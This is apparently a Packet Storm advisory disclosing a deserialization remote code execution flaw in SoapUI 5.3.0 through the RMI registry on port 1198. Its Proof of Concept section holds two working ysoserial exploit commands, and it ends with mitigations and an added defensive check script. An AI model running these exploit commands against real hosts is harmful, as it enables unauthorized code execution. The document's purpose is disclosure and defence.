
SmartBear SoapUI 5.3.0 Remote Code Execution Via Deserialization

05 Oct 2017 | Reported by Jakub Palaczynski | Type: packetstorm | Source: packetstormsecurity.com

`Title: SmartBear SoapUI - Remote Code Execution via Deserialization  
Author: Jakub Palaczynski  
Date: 12. July 2017  
  
Exploit tested on:  
==================  
SoapUI 5.3.0  
Also works on older versions.  
  
Vulnerability:  
**************  
  
Remote Code Execution via Deserialization:  
=================================  
  
SoapUI by default listens on all interfaces on TCP port 1198, where the  
SoapUI Integration (RMI) instance can be found. SoapUI uses vulnerable  
Java libraries (commons-collections-3.2.1.jar and  
groovy-all-2.1.7.jar) which can be used to remotely execute commands  
with the permissions of the user that started SoapUI.  
  
Entry point:  
Java RMI Registry on TCP port 1198  
Vulnerable libraries used - commons-collections-3.2.1.jar and  
groovy-all-2.1.7.jar  
  
Proof of Concept:  
Sample PoC using Commons Collections vulnerable library:  
java -cp ysoserial-0.0.5-SNAPSHOT.jar ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 CommonsCollections1 'ping OUR_IP'  
Sample PoC using Groovy vulnerable library:  
java -cp ysoserial-0.0.5-SNAPSHOT.jar ysoserial.exploit.RMIRegistryExploit SOAPUI_IP 1198 Groovy1 'ping OUR_IP'  
  
Mitigations:  
- bind SoapUI Integration instance to localhost if possible  
- update all Java libraries that are known to be vulnerable:  
commons-collections-3.2.1.jar  
groovy-all-2.1.7.jar  
  
Contact:  
========  
Jakub[dot]Palaczynski[at]gmail[dot]com  
  
  
`
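
A defender-side check for the two mitigations listed in the advisory, added here as an example and not part of the original advisory: it looks for the two named jars under an install directory and flags listeners on TCP port 1198 that are not bound to loopback. The function names, the `SOAPUI_HOME` path and the sample `ss -ltn` output are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added defensive check (not from the advisory). The port and jar names come
# from the advisory; the install path and sample data below are assumptions.

RMI_PORT=1198
VULN_JARS="commons-collections-3.2.1.jar groovy-all-2.1.7.jar"

# Print every copy of the advisory's two jars found under directory $1.
find_vulnerable_jars() {
    for jar in $VULN_JARS; do
        find "$1" -type f -name "$jar" 2>/dev/null
    done | sort
}

# Read `ss -ltn` output on stdin; print local addresses listening on
# RMI_PORT that are not loopback, so reachable from other hosts.
exposed_rmi_listeners() {
    awk -v port="$RMI_PORT" '
        $1 == "LISTEN" {
            n = split($4, parts, ":")          # port is the last field
            if (parts[n] != port) next
            addr = substr($4, 1, length($4) - length(parts[n]) - 1)
            if (addr ~ /^127\./ || addr == "[::1]") next
            print $4
        }'
}

# Constructed sample of `ss -ltn` output (not captured from a real host).
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      50     0.0.0.0:1198       0.0.0.0:*
LISTEN 0      50     127.0.0.1:1198     0.0.0.0:*
LISTEN 0      128    [::]:1198          [::]:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*'

# Usage on a live host (SOAPUI_HOME is an assumed install path):
#   find_vulnerable_jars "$SOAPUI_HOME"
#   ss -ltn | exposed_rmi_listeners
printf '%s\n' "$SAMPLE_SS" | exposed_rmi_listeners
```

Any line printed by `exposed_rmi_listeners` means the RMI registry is reachable from other hosts; any path printed by `find_vulnerable_jars` is a copy of one of the two libraries the advisory names.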
